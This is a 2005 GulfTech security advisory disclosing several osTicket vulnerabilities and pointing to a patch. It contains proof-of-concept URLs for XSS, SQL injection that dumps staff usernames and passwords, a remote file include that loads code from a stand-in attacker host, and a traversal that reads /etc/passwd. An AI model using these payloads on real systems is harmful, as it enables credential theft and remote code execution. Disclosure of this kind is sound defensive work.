osTicketSQL.txt

`##########################################################  
# GulfTech Security Research May 2nd, 2005  
##########################################################  
# Vendor : osTicket  
# URL : http://www.osticket.com/  
# Version : All Versions  
# Risk : Multiple Vulnerabilities  
##########################################################  
  
  
Description:  
osTicket is a widely-used open source support ticket system. It is a  
lightweight support ticket tool written mainly using PHP scripting  
language. There are several vulnerabilities in the osTicket software  
that may allow for an attacker to take control of the affected web  
server, disclose sensitive data from the database, or read arbitrary  
files. These issues have been reported to the developers and a new  
updated version of osTicket is available for download. All affected  
users should upgrade their osTicket installations immediately.  
  
  
Cross Site Scripting:  
Cross site scripting exists in osTicket. This vulnerability exists  
due to user supplied input not being checked properly.  
  
http://example.com/[email protected]&t=480826[XSS]  
http://example.com/include/header.php?osticket_title=%3C/title%3E[XSS]  
http://example.com/include/admin_login.php?em=asdf[XSS]  
http://example.com/include/user_login.php?e=asdf[XSS]  
http://example.com/include/open_submit.php?err=[XSS]  
  
This vulnerability could be used to steal cookie based authentication  
credentials within the scope of the current domain, or render hostile  
code in a victim's browser.  
  
  
  
Script/HTML Injection:  
When adding a ticket an attacker may include malicious script or html  
in the name and subject fields and have it rendered in the browser of  
anyone who views it (such as an admin) and may be used in part with  
CSRF to force users or admins to perform arbitrary commands.  
  
  
  
SQL Injection:  
osTicket is prone to two SQL Injection issues, one lies in the search  
engine, and one lies in viewing tickets. Below are a few examples.  
  
http://example.com/admin.php?a=view&id=-99%20UNION%20SELECT%20username,  
password,0,0,0,0,0,0,0,0,0%20FROM%20ticket_reps%20WHERE%201/*  
  
http://example.com/admin.php?a=view&id=-99%20UNION%20SELECT%20username,  
password,'[email protected]',0,0,0,0,0,0,0,0%20FROM%20ticket_reps%20WHERE%201/*  
  
http://example.com/view.php?s=advanced&query=&cat=-99%20UNION%20SELECT  
%2031337,0,0,0,password%20FROM%20ticket_reps%20WHERE%20ID=5/*&status=&  
sort=ID&way=ASC&per=5&search_submit=Search  
  
The first example is not that easy to exploit, and the example I have  
given only works if you are logged in as admin. Why is this? Let's have  
a look at includes/viewticket.php  
  
//user is allowed to view ticket  
$show = $_SESSION[user][type] == "admin" ? 1: !$cat_row[hidden];  
  
$admin_permis = ($_SESSION[user][type] == "admin" and   
(@in_array($cat_row[ID],  
$oslogin[cat_access]) or $oslogin[cat_access][0] == "all" or   
$oslogin[ID] ==  
ADMIN));  
$client_permis = ($_SESSION[user][type] == "client" and   
$ticket_row[email] ==  
$_SESSION[user][id]);  
  
if (!$client_permis and !$admin_permis) {  
echo "Access denied.";  
}  
  
As we can see from this code we might be able to influence  
$ticket_row[email] directly from the query string if magic_quotes_gpc  
is off, but a lot of the time it is on. If an attacker cannot  
influence the returned email address during a UNION SELECT then he can do  
something like SELECT into an outfile or try to enumerate data using built  
in MySQL functions. This issue is exploitable, just not as easy as some  
SQL Injection issues to exploit because if a certain criteria isn't  
returned then you are denied access. The search engine issue on the other  
hand is pretty run of the mill and not hard for an attacker to exploit. An  
attacker needs to be logged in with at least a user account to exploit  
these issues.  
  
  
Remote File Include Vulnerability:  
osTicket is prone to both remote and local file include vulnerabilities  
which may allow for an attacker to execute arbitrary commands on the victim  
webserver by including malicious files. Lets have a look at the vulnerable  
file which is titled "include/main.php"  
  
if ($config[search_disp]) {  
include("$include_dir/search.php");  
}  
  
If globals are set to on, and no include restrictions are in effect then  
we can include any php code of our choice remotely. Of course the server  
hosting the malicious file to be included could not have php enabled, or  
the file would be parsed before it reached the victim server.  
  
http://example.com/include/main.php?config[search_disp]=true&include_dir=http://attacker  
  
This issue is very dangerous when present, but regardless of your server  
configuration you are still encouraged to upgrade immediately.  
  
  
  
Directory Traversal Vulnerability:  
There is a directory traversal issue within the attachments.php script used  
by osTicket. The good news is that this vulnerability only exists when the  
user has activated file uploads (which has to be done manually and is not  
present by default), but it should be noted that even if the attachments  
have not been activated the error messages outputted by this script still  
cause for a cross site scripting issue. Below is an example.  
  
http://example.com/attachments.php?file=../../../../../../../etc/passwd  
  
This vulnerability can be used to retrieve arbitrary files on the target  
webserver, and may aid in further attacking a vulnerable system.  
  
  
  
Solution:  
The developer was contacted in early April, and a patch has been developed  
and should be available now.  
  
  
  
Related Info:  
The original advisory can be found at the following location  
http://www.gulftech.org/?node=research&article_id=00071-05022005  
  
  
  
Credits:  
James Bercegay of the GulfTech Security Research Team  
`